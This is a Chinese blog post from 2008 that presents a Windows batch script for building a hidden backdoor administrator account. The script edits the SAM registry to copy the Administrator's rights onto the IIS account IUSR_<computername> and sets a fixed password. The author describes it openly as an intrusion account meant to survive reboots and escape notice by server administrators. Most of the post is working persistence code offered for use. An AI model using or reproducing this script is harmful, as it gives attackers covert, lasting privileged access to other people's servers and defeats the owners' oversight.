真正隐藏administrator帐号 - 逝魂博客
当前位置: 首页 > 学习天地 > 正文

真正隐藏administrator帐号

网上看了很多复制administator权限帐号的方法或者工具,比如建立admin$,所谓的隐藏帐号。

并复制administrator的权限。

其实这是暂时、一次性隐藏而已,服务器重启一下通过“计算机管理”或者net user

都能看到的。

本批处理根据服务器的情况,结合自己的研究,使用服务器本地iis帐号IUSR_计算机名,

设置密码位12345678(可以自己改一下批处理最后一行)。

这个来复制administrator权限,难以发现与引起怀疑。

(当然其他帐号也可以,用这个帐号主要通过机器名就能知道自己想要的入侵帐号密码是多少)

==================

echo off
setlocal enabledelayedexpansion
echo %computername%
echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >”%windir%\..\1.reg”
regini “%windir%\..\1.reg”
regedit /e “%windir%\..\1.reg” HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%
rem unicode ->ascii
type “%windir%\..\1.reg” >”%windir%\..\2.reg”
del /q “%windir%\..\1.reg”
rem find IUSR_%computername% 的对应id
for /F “delims=( tokens=1-5* skip=3” %%a in (%windir%\..\2.reg) do set iusr_id=%%b
del /q “%windir%\..\2.reg”
rem export administrator register
regedit /e “%windir%\..\1.reg” HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
type “%windir%\..\1.reg” >”%windir%\..\2.reg”
del /q “%windir%\..\1.reg”
rem replace 1fx->iusr_id
for /f “tokens=* delims=:” %%i in (%windir%\..\2.reg) do (
for /f “tokens=*” %%j in (“%%i”) do (
set TMP=%%j
set “TMP=!TMP:000001F4=00000%iusr_id:~0,3%!”
echo !TMP!>>%windir%\..\1.reg
)
)
regedit /s %windir%\..\1.reg
del /q %windir%\..\1.reg
del /q %windir%\..\2.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >”%windir%\..\1.reg”
regini “%windir%\..\1.reg”
del /q “%windir%\..\1.reg”
net user IUSR_%computername% 12345678

转载请注明转自逝魂博客 ,本文链接: http://www.gtsow.com/artices/107.html

该日志由 逝魂 于2008年12月13日发表在学习天地分类下,
您还可以在保留本文地址和作者的前提下转载到您的网站或空间。

报歉!评论已关闭.